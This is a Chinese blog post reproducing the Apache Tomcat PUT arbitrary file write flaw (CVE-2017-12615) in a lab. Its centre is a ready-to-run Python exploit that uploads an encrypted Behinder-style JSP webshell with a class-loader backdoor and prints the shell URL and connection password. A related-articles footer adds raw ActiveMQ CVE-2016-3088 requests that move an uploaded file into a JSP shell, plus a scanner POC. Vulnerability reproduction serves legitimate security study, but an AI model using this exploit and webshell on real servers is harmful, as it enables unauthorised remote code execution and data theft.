【漏洞复现】Tomcat 任意写入文件漏洞(CVE-2017-12615)

最新推荐文章于 2025-06-11 16:21:32 发布
最新推荐文章于 2025-06-11 16:21:32 发布
阅读量1.8k 收藏 4
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: tomcat java web安全 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_46344990/article/details/127832312
本文详述了Apache Tomcat的一个高危漏洞,攻击者通过PUT请求上传恶意JSP,执行代码实现服务器控制。涉及版本范围、漏洞利用步骤和利用脚本示例,重点在于如何在Windows/Linux环境中利用漏洞获取权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、漏洞描述

Apache Tomcat 7.0.0到7.0.79版本中存在远程代码执行漏洞,当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法时,攻击者可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,文件中的代码被服务器执行。

二、影响版本

Apache Tomcat >=7.0.0,<=7.0.79

三、漏洞利用

漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执 行, 导致服务器上的数据泄露或获取服务器权限。

由于conf/web.xml的readonly参数的设置为false,意思为开启PUT方法,默认情况下是禁止PUT和DELETE方法的

搭建tomcat,使用vulfous靶场本地拉取docker。打开后用burp抓包

将GET方法改为PUT方法,路径后改为/1.jsp/,使用冰蝎提供的木马或者一句话木马,切记文件名后加斜杠绕过,返回201状态码(代表已经创建)

介绍八种请求方式:

HTTP/1.1协议中共定义了八种方法,来表明Request-URL指定的资源不同的操作方式。HTTP/1.0定义了三种请求方法:GET、POST、和HEAD方法HTTP/1.1新增了五种方法:OPTIONS,PUT,CONNECT,DELETE和TRACE方法。

冰蝎连接,成功连接,找到flag

四、脚本

import requests
import sys
import time

#rebeyond
def attack(url):
   user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
   headers={"User-Agent":user_agent}
   data="""<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
   <%!class U extends ClassLoader{U(ClassLoader c){
      super(c);
   }public Class g(byte []b){
   return super.defineClass(b,0,b.length);
   }
   }%>
   <%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";
   session.putValue("u",k);
   Cipher c=Cipher.getInstance("AES");
   c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
   new U(this.getClass().getClassLoader()).g(c.doFinal(Base64.getDecoder().decode(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
   """
   try:
      requests.put(url, headers=headers, data=data)

      time.sleep(2)

      response = requests.get(url[:-1], headers=headers)
      if response.status_code == 200:
         print ('success!')
      else :
         print (response.status_code)

   except :
      print("error")

if __name__ == '__main__':
    url=input("输入url:")
    file=input("文件名:")
    target_url = url+ '/'+file+'.jsp/'
    attack(target_url)
    print('shell: ' + target_url[:-1])
    print('冰蝎连接密码:rebeyond ')

运行:

tomcat漏洞学习——CVE-2017-12615Tomcat任意写入文件漏洞
记录并分享学习安全的知识点..
05-05 1059
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞原理 四、环境搭建 五、 漏洞复现 (一)手动验证复现 1.首先抓包,验证jsp文件: 2.发现404页面,换成txt文件,发现可以的: 3.根据源码,只要在jsp小马后面加一个/,就可以上传成功: 4.小马利用: ​(二)exp验证复现 ​(三)工具检测 一、概述 tomcat的配置具有可写权限,因此可以利用put方法上传任意文件。但是tomcat对...
Tomcat 任意写入文件漏洞CVE-2017-12615
ANOrange的博客
03-29 614
Tomcat 任意写入文件漏洞CVE-2017-12615漏洞复现
Tomcat任意写入文件漏洞CVE-2017-12615漏洞复现
m0_55854679的博客
07-31 913
Tomcat任意写入文件漏洞CVE-2017-12615漏洞复现
CVE-2017-12615源码分析与漏洞复现(Tomcat 任意文件上传)
最新发布
spinage的博客
06-11 1663
CVE-2017-12615是Apache Tomcat 7.0.0至7.0.81版本中的高危远程代码执行漏洞,当服务器配置readonly=false时,攻击者可利用HTTP PUT方法上传恶意JSP文件漏洞成因在于文件后缀校验缺失和系统路径规范化特性(如Windows文件名处理和Java路径规范化),可通过三种方式绕过:添加空格、NTFS数据流或路径分隔符。利用该漏洞可上传webshell实现RCE,影响CVSS评分8.1。官方在7.0.82版本中完全修复该漏洞复现过程包括搭建靶机环境、构造特殊请求
Tomcat PUT方法任意文件漏洞CVE-2017-12615
haha1314的博客
07-25 1944
Tomcat PUT方法任意文件漏洞CVE-2017-12615Tomcat版本:8.5.19 Apache Tomcat 7.0.0 - 7.0.79 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件: <servlet> <servlet-name>default</servlet-name> ...
Tomcat任意写入文件漏洞CVE-2017-12615复现(详细完整原理篇,小白也能看得懂)
qq_68064663的博客
05-05 6804
tomcat任意写入文件漏洞复现
Tomcat 任意文件写入漏洞 CVE-2017-12615
qq_42352268的博客
07-15 953
复现 CVE-2017-12615
Tomcat任意写入文件漏洞CVE-2017-12615复现
m0_54899775的博客
03-17 4666
Tomcat任意写入文件漏洞CVE-2017-12615复现
Tomcat任意文件写入(CVE-2017-12615)漏洞复现
weixin_45540609的博客
07-28 2219
一、漏洞原理 影响范围:pache Tomcat7.0.0-7.0.81(默认配置) 如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞CVE-2017-12615:远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的).
Tomcat 通过 PUT 方法任意写入文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1571
CVE-2017-12615 对应的漏洞任意文件写入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件Tomcat设置了写权限(readonly=false),导致可以使用PUT方法上传任意文件
Tomcat远程代码执行漏洞CVE-2017-12615
热门推荐
Unitue_逆流
10-14 1万+
实验环境操作机:windows XPIP:172.16.11.2目标机:windows server 2003IP:172.16.12.2实验目的了解Tomcat远程代码执行漏洞危害掌握检测利用Tomcat远程代码执行漏洞的能力实验工具Firefox: 中文俗称火狐,一个自由及开放源代码网页浏览器实验内容 TomcatTomcat服务器是一个免费的开放源代码的Web应用服务器。Tomcat是Apa
Tomcat任意文件上传(CVE-2017-12615漏洞复现(附POC)
byt8563的博客
06-30 4472
欢迎使用Markdown编辑器 • 漏洞名称:Tomcat任意文件上传漏洞漏洞编号:CVE-2017-12615漏洞影响:上传包含任意代码的文件,并被服务器执行。 • 影响平台:Windows • 影响版本:Apache Tomcat 7.0.0 - 7.0.81 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,
漏洞复现Tomcat PUT方法任意文件漏洞CVE-2017-12615
weixin_42090431的博客
01-02 1087
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)
Tomcat CVE-2017-12615漏洞复现
2401_82451607的博客
09-20 947
Tomcat CVE-2017-12615漏洞复现
Tomcat Arbitrary Write-file Vulnerability through PUT Method (CVE-2017-12615)
cgjil的博客
09-13 169
CVE-2017-12615 对应的漏洞任意文件写入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件Tomcat设置了写权限(readonly=false),导致可以使用PUT方法上传任意文件
tomcat 文件上传 (CVE-2017-12615)漏洞复现
weixin_42675091的博客
09-01 542
tomcat 文件上传 (CVE-2017-12615)漏洞复现
AvtiveMQ任意文件上传漏洞(CVE-2016-3088)漏洞复现
03-19
### CVE-2016-3088 漏洞概述 CVE-2016-3088 是 Apache ActiveMQ 的一个任意文件写入漏洞,主要由于 `fileserver` 应用未受保护且允许通过 HTTP 请求创建和移动文件。此漏洞影响的版本范围为 Apache ActiveMQ 5.x 至 5.14.0 版本[^3]。 --- ### 环境准备 为了复现漏洞,需搭建受影响的环境: #### 使用 VulnHub 靶场 VulnHub 提供了一个方便的漏洞测试平台,可以快速部署目标服务。按照以下步骤操作: 1. 下载并启动 Docker 或虚拟机镜像。 2. 安装指定版本的 Apache ActiveMQ(如 5.13.0),确保其配置启用了 `fileserver` 功能。 3. 修改 `conf/jetty.xml` 文件中的 `<bean>` 节点,启用 `fileserver` Web 应用程序。 ```bash docker run --name activemq -p 8161:8161 webcenter/activemq:5.13.0 ``` 上述命令会运行一个容器化的 ActiveMQ 实例,并将其管理端口映射到主机上的 8161 端口。 --- ### 漏洞验证方法 #### 利用工具或手动发送请求 可以通过向 `/fileserver/{filename}` 发送 `PUT` 请求来验证是否存在漏洞。以下是具体过程: 1. **构造恶意请求** 向服务器发送一个带有自定义数据体的 `PUT` 请求,尝试在 `fileserver` 中创建新文件。 ```http PUT /fileserver/test.txt HTTP/1.1 Host: localhost:8161 Content-Type: text/plain Content-Length: 17 This is a test file. ``` 2. **确认文件已成功上传** 访问路径 `/fileserver/test.txt` 并查看返回的内容是否匹配预期的数据。 3. **执行 MOVE 方法** 将刚刚创建的文件移动至其他目录下,例如 Tomcat 的根目录或其他可加载的位置。 ```http MOVE /fileserver/test.txt HTTP/1.1 Host: localhost:8161 Destination: http://localhost:8161/tomcat/webapps/root/shell.jsp Overwrite: T ``` 如果一切正常,则会在目标位置生成新的 JSP 文件,从而实现远程代码执行的效果。 --- ### 自动化检测脚本 (POC) XRay 工具提供了针对 CVE-2016-3088 的自动化扫描功能,下面是一个简单的 YAML 格式的 POC 描述文件[^4]: ```yaml name: poc-yaml-activemq_CVE-2016-3088 set: r1: randomInt(5, 10) r2: randomLowercase(r1) rules: - method: PUT path: /fileserver/{{r2}} expression: | response.status == 204 detail: author: laura_lion links: - https://github.com/Laura0xiaoshizi ``` 将以上内容保存为 `.yaml` 文件后导入 XRay 执行即可完成批量探测工作。 --- ### 注意事项 尽管漏洞利用相对简单,但在实际环境中应严格遵循法律规范,仅限于授权范围内进行渗透测试活动。此外,在生产环境下务必及时更新软件补丁以防止此类安全风险的发生。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Oxo Security

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值